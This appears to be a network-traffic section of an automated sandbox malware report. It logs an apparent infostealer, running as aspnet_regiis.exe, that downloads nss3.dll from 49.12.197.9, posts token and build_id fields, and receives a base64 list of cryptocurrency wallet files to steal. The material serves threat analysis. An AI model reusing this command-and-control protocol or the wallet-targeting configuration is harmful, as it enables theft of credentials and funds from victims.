                                                                                                                                                                            2024-10-03 01:27:10 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
                                                                                                                                                                            Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                                                                            2024-10-03 01:27:10 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                                                                                                            Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                                                                            2024-10-03 01:27:10 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                                                                                                            Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                                                                            2024-10-03 01:27:10 UTC15605INData Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f
                                                                                                                                                                            Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            16192.168.2.94972749.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:11 UTC192OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:11 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:11 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 2046288
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thursday, 03-Oct-2024 01:27:11 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-03 01:27:11 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                            2024-10-03 01:27:11 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                                                                                                            Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                                                                            2024-10-03 01:27:11 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                                                                                                            Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                            2024-10-03 01:27:11 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                                                                                                            Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                                            2024-10-03 01:27:11 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                                                                                                            Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                                                                            2024-10-03 01:27:11 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                                                                                                            Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                                            2024-10-03 01:27:11 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                                                                                                            Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                                                                            2024-10-03 01:27:11 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                                                                                            Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                                                                            2024-10-03 01:27:12 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                                                                            Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                                            2024-10-03 01:27:12 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                                                                                            Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            17192.168.2.94972949.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:14 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 1145
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:14 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------KJJJKFIIIJJJECAAEHDBCont
                                                                                                                                                                            2024-10-03 01:27:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:15 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:27:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            18192.168.2.94973049.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:16 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:16 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------DBFIEHDHIIIECAAKECFHCont
                                                                                                                                                                            2024-10-03 01:27:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:16 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:27:17 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                            Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            19192.168.2.94973149.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:17 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKF
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
